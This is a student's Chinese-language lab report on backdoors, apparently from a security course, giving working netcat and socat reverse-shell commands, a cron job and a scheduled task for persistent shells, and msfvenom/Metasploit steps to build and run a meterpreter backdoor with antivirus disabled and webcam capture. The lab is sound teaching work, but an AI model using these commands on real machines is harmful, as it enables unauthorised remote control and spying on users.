20155223 Exp2 后门原理与实践

20155223 Exp2 后门原理与实践

实验预热

一、windows获取Linux shell

Windows:使用 ipconfig 命令查看当前机器IP地址。
832599-20180327212515555-1425403387.png
进入ncat所在文件地址,输入命令:ncat.exe -l -p 5223
832599-20180327212653890-161536411.png
Linux:在命令行终端输入命令:nc windows主机的IP地址 5223 -e /bin/sh。-e反向连接Windows。
832599-20180327213059965-1718185866.png
一个回车之后,反向链接建立成功。输入个ls,然后收到一堆乱码,后确认是汉字无法被Windows命令终端识别。
832599-20180327213330973-1539798903.png

二、Linux获得Windows Shell

在Linux终端输入命令ifconfig查看虚拟机Linux的IP号。
然后输入命令nc -l -p 5223让虚拟机开始监听指定端口5223。
832599-20180327213705222-685791957.png
在Windows命令行终端输入命令ncat.exe -e cmd.exe Linux的IP 5223,让Windows准备监听端口5223。
832599-20180327214039299-1912072398.png
Linux获得Windows的相关信息,乱码是不可识别的中文。
832599-20180327214206675-42770123.png

三、使用netcat获取主机操作Shell,cron启动

Windows终端输入命令ncat.exe -l -p 5223开始监听端口5223。
Linux终端驶入命令crontab -e,选择基础型vim编写定时任务。在最后一行输入任意小于60的数字 * * * * /bin/netcat Windows的IP 5223 -e /bin/sh
832599-20180327215551911-466267810.png
然后就等待到时启动。
832599-20180327215600616-919088018.png

四、使用socat获取主机操作Shell, 任务计划启动

下载并解压socat
windows:打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器。
在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5223 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到相应端口,同时把cmd.exestderr重定向到stdout上。
832599-20180327215831547-1472436087.png
Linux:输入指令socat - tcp:windows_IP:5223
832599-20180327220001403-1392836874.png

正式实验

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

关闭所有杀毒软件。
在Linux命令行终端输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=5223 -f exe > 20155223_backdoor.exe建立后门程序。
832599-20180327220251369-1984081580.png
借用已经建立好的Ncat通道传输后台程序到Windows上。
832599-20180327220418959-1509761242.png
在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口。
832599-20180327220947574-1766556381.png
输入以下命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST Linux的IP
set LPORT 5223
show options

再输入exploit开始监听。
832599-20180327221510735-485284319.png
Windows:命令行打开后台程序。
832599-20180327221539586-1993878694.png
后台打开成功,开始乱搞。
832599-20180327221609904-1836361710.png
以及一个可以延时启动的摄像头抓拍。
832599-20180327221702704-767609201.png

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

从奇奇怪怪的网址里下东西还不杀毒检查。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

一些伪装成无害应用程序的后门混入系统当中。

(3)Meterpreter有哪些给你映像深刻的功能?

这玩意能启动摄象头!

(4)如何发现自己有系统有没有被安装后门?

检查操作系统的主机日志,这样可以找出一些不会修改日志文件的后门程序。
想找出会修改日志文件的后门,就必须借助抓包工具,若有奇怪的目的IP,那肯定就是有后门。

实验总结与体会

我突然觉得我是全裸在我自己的电脑面前。

转载于:https://www.cnblogs.com/battlefieldheros/p/8660642.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值